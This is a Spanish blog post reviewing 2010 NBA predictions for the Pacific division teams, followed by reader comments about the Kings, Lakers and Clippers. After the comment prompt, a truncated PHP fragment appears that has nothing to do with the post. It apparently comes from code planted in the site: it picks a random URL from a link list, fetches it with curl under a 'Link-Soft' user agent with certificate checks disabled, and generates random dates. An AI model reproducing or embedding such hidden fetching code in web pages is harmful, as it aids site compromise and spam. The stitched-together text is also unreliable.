Revisando los pronósticos t2010: Pacific

25 de February de 2010 por TheDeerHunter

Los Angeles Lakers: Campeones. Se puede tener al mejor jugador del planeta, rodeado de un equipazo impresionante, en la franquicia más pudiente de la NBA… se puede jugar con toda la ventaja del mundo y nada te puede garantizar el anillo. Como decíamos en su día, nadie ha logrado repetir desde el “Threepeat”. A los Lakers se les ve al tran-tran. Problemas físicos, momentos de indolencia, de desgaste, victorias apuradas… pero siguen ahí arriba pudiendo permitirse ser demoledores incluso sin alguna (o varias) de sus estrellas. Podemos decir exactamente lo mismo que dijimos en su día. El pronóstico: Campeones. Es lo único que les vale.

Lo mejor: El mejor Kobe de la historia… es decir mucho. También el mejor Pau de la historia. Sólo los problemas físicos les apartarán de muchos premios. A Artest se le ve metido en el proyecto y Farmar y Shannon Brown son las sorpresas agradables desde el banquillo.

Lo peor: Vujacic. El hombre que no conoce la palabra “crisis”. Capaz de hacer bueno a Radmanovic. Pensar en su contrato nos produce acidez.

Phoenix Suns: No vamos por muy buen camino en cuanto a nuestras previsiones con ellos. Les dimos fuera de playoffs y apuntamos algunas claves que no ofrecían un buen panorama. Tampoco es que puedan dormirse en los laureles, sobre todo con lo caro que se ha puesto ahora el oeste, pero llevan camino de disputar postemporada siendo fieles a su estilo. Run&Gun puro y duro, los más anotadores de la liga… pero también de los que más reciben. En nuestra defensa hay que decir que no muchos apostaban porque iban a meter a dos tíos en el quinteto all-star del Oeste, ni que Stoudemire iba a permanecer en el equipo a este nivel de entrega, o que Channing Frye iba a destaparse como una amenaza exterior letal, o que Robin Lopez iba a superar algunas noches las prestaciones de su hermano… Con todo, mejorando previsiones, siguen quedando muchas dudas y su inconsistencia tampoco permite revisar significativamente al alza nuestra apuesta. Será difícil que alcancen la 2ª ronda.

Lo mejor: Muchas noches en las que Nash o Stoudemire han tenido poco que envidiar a la mejor versión de si mismos. Auténticas exhibiciones de un juego ofensivo que nos fascina tanto. Channing Frye es una de las sorpresas positivas del campeonato. Mérito del técnico, por cierto.

Lo peor: El viacrucis de los meses diciembre y enero. La defensa. Los rumores de traspaso de Stat. La lesión de Barbosa.

Los Angeles Clippers: Cuando uno apuesta a favor de este equipo ya sabe a lo que se expone. El gafe volvió pronto. Ni un sólo minuto han podido disfrutar de Blake Griffin. Después ha venido el irregular rendimiento de Al Thorton, o de Baron Davis, Telfair, los problemas físicos de Gordon… hubo un conato de reacción cuando se especulaba con el inminente regreso de Griffin. Duro golpe moral y por partida doble. A dos meses todavía para el final del curso los Clippers dan por perdida la campaña. Lo único que les mueve es poner toda la carne en el asador para hacer parecer atractivo el proyecto a los ojos de un hipotético agente libre. Margen salarial tienen, otra cosa es que los dueños deseen hacerlo efectivo. En una cosa sí acertamos. Dunleavy se la jugaba y ha terminado mal para él. Lo cierto es que por H, por B o por C apenas nunca ha logrado sacar rendimiento a su plantilla.

Lo mejor: Kaman, ganándose un hueco hasta el all-star. Alguna racha en la que mostraron algo de lo que pudo ser y no fue.

Lo peor: La lesión de Griffin, por supuesto, pero también las apuestas por Thorton o Dunleavy, que han terminado saliendo rana.

Sacramento Kings: Hay que decir que, a pesar de que les pusimos a caer de un burro en su día, y de que han sufrido serios contratiempos en forma de lesiones, la campaña de los Kings ha sido más digna de lo que esperábamos. Al menos no se han entregado a la carrera por el “John Wall Trophy” tan descaradamente como otros. Por momentos, incluso, se les vio con arrestos para luchar por postemporada, de la mano fundamentalmente del gran hacer de sus rookies, Tyreke Evans y Casspi, por encima de lo esperado. La lástima ha sido Kevin Martin que finalmente no ha tenido fortuna en este equipo.

Lo mejor: Tyreke Evans impresionante. Decíamos que podía llegar a ser un Wade o un Crawford. Ahora mismo nos inclinaríamos más por lo primero que por lo segundo. Casspi muy bien también. Promete.

Lo peor: La lesión de Francisco García fue una de las más absurdas de la historia. Kevin Martin ha terminado saliendo del equipo cuando empezó sensacional. Hawes no termina de explotar… y Sergio dará sus asistencias a otra gente.

Golden State Warriors: No pusimos grandes cotas a los Warriors. Entre el 9º y 12º de la conferencia… sólo 3 equipos por detrás suyo. Ni tan alto han llegado. Sólo los Wolves son peores y en puntos recibidos no hay quien les tosa el premio. Es cierto que el “capitán” terminó por hacer maletas y que han sufrido todo tipo de problemas. Han llegado a jugar (y a ganar) con 5 tipos e incluso se han visto obligados a tirar de la liga de desarrollo para reinventarse a siímismos. Da un poco lo mismo. Van de ser, en el mejor de los casos, un despropósito a ser un caos en el peor de ellos. Sólo monstruosidades de partidos de Ellis, Maggette o Curry han logrado incrementar el casillero de victorias/milagros.

Lo mejor: Verlos sigue siendo un fiestón de puntos… y, si estás en el lado rival te lo pasas todavía mejor. Hablando más en serio, Ellis o Curry son jugones considerables.

Lo peor: Que no tenemos muy claro a dónde conduce todo este experimento… y ser de los Warriors no debe de ser ahora mismo plato de buen gusto.

Comenta

4 comentarios a esta entrada

  1. Txusma dice:
    #1

    Gran decepción el juego interior de los Kings que parece se iban a comer el mundo. Por otro lado, hay que decir que Whestpal está mareando mucho la perdiz dando un día minutos y titularidad a Donte Greene (por ejemplo) y haciéndole jugar 5 minutos al día siguiente. Hace poco May y Hawes comentaron esto en público y la respuesta de Whestpal fue la de dejar fuera de la convocatoria al pívot… Vale que Thompson tiene muchos problemas de faltas y que Hawes no acaba de pegarse por dentro, pero no sé yo si la gestión de la plantilla de Sacramento ha sido la mejor…

      Citar

  2. Love Denise dice:
    #2

    Yo no renovaría a Farmar y en caso de hacerlo, no le daría mucho más de lo que actualmente cobra.

    La dirección de los clippers da bandazos año tras otro, aunque tienen margen salarial, no creo que para el próximo hagan una revolución y se monten un equipazo

      Citar

  3. Viva_Dirk dice:
    #3

    Bueno Txus la temporada de Hawes si ha sido floja, pero no creo que halla decepcionado Jason Thompson, que promedia 12.7 puntos y 8.8 rebotes, en mi opinión su tope esta un poco mas arriba pero no mucho, eso si necesita controlarse con las faltas.

    Donte Greene es buenísimo, deberian repartir todos los minutos interiores entre esos 3 jugadores, ya que May no parece estar preparador para el ritmo de la NBA.

      Citar

  4. Txusma dice:
    #4

    Algo habrá decepcionado Thompson cuando no es titular indiscutible. Me refería a que parecía claro que Thompson-Hawes serían la pareja interior de los Kings durante muchos años y esta temporada la cosa ha sido irregular, tanto por ellos como por Whestpal.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>